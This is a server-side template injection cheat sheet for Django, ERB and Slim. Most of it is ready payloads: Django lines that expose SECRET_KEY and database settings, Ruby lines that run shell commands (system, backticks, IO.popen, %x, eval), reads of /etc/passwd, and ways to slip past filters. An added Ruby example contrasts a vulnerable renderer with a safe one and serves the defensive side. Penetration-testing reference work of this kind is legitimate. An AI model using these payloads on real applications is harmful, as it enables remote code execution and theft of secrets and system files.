Other Template Engines (Ruby, Node, Django)
| CWE | CWE-1336 |
| Tools | tplmap |
| Difficulty | 🔴 advanced |
Django Templates (Python)
Django's template language is deliberately restricted rather than sandboxed: it cannot call methods with arguments, import modules, or evaluate arbitrary Python, so RCE is rarely possible. Information disclosure is common, though, because any object placed in the template context, and any attribute or zero-argument callable reachable from it, can be read.
Information disclosure (the settings object is not in the context by default, but is frequently exposed through a custom context processor):
{{ settings.SECRET_KEY }}
{{ settings.DATABASES }}
{% debug %}
{% debug %} dumps the entire current context and the imported modules, so it is worth trying even when you do not know which variables are available. To escalate, enumerate custom template tags and filters (loaded with {% load ... %}): they are ordinary Python and are not subject to the engine's restrictions, so a tag that shells out or evaluates its argument turns disclosure into RCE.
ERB (Ruby)
ERB is the default template engine for Ruby on Rails. Injection happens when user input is concatenated into the template source before it is compiled (ERB.new(src).result), instead of being passed to the compiled template as data; once inside the source, <%= %> evaluates arbitrary Ruby.
Detection:
<%= 7*7 %>
RCE:
<%= `id` %>
<%= system('id') %>
<%= IO.popen('id').read %>
File read:
<%= File.read('/etc/passwd') %>
Bypass techniques (alternative spellings for when a filter blocks backticks or the word system):
<%= %x(id) %>
<%= Kernel.exec('id') %>
<%= eval("system('id')") %>
Note that Kernel.exec replaces the current Ruby process, so its output never reaches the HTTP response; use it only with an out-of-band channel (e.g. a reverse shell or a DNS callback).
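The ERB sink described above, as an added example that is not part of the original page: the vulnerable concatenation of user input into the template source beside the safe form that passes the value in as data, with the page's 7*7 probe used as the detection check. The function names are made up for illustration. The same distinction applies to Slim, where the equivalent sink is building the template source string that Slim::Template.new is given.

```ruby
require 'erb'

# Vulnerable pattern: the untrusted value is interpolated into the template
# SOURCE, so ERB compiles and runs whatever the attacker supplied.
def render_vulnerable(untrusted)
  ERB.new("Hello #{untrusted}!").result(binding)
end

# Safe pattern: the template source is a fixed string; the untrusted value
# is handed to ERB as DATA via result_with_hash and HTML-escaped on output.
def render_safe(untrusted)
  template = ERB.new("Hello <%= ERB::Util.html_escape(name) %>!")
  template.result_with_hash(name: untrusted)
end

# Detection probe from the page: if 7*7 comes back as 49 the expression was
# evaluated by the engine, i.e. the renderer is injectable.
def erb_injectable?(renderer)
  renderer.call("<%= 7*7 %>").include?("49")
end

if __FILE__ == $PROGRAM_NAME
  probe = "<%= 7*7 %>"                               # constructed attacker input
  puts "vulnerable: #{render_vulnerable(probe)}"     # Hello 49!
  puts "safe:       #{render_safe(probe)}"           # Hello &lt;%= 7*7 %&gt;!
  # Same sink, stronger payload: file access through the injected expression.
  puts render_vulnerable("<%= File.exist?('/etc/passwd') %>")
end
```

Run it directly to see both renderings side by side; the probe string is the only attacker-controlled value, and only the concatenating renderer evaluates it.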
Slim (Ruby)
Slim is a lightweight, indentation-based templating engine for Ruby. A line starting with = outputs the value of a Ruby expression, so any ERB payload works here once the <%= %> wrapper is dropped. Slim HTML-escapes that output by default, which hides markup but does nothing to stop the expression from executing.
Detection:
= 7*7
RCE:
= `id`
= system('id')
= %x(id)
File read:
= IO.read('/etc/passwd')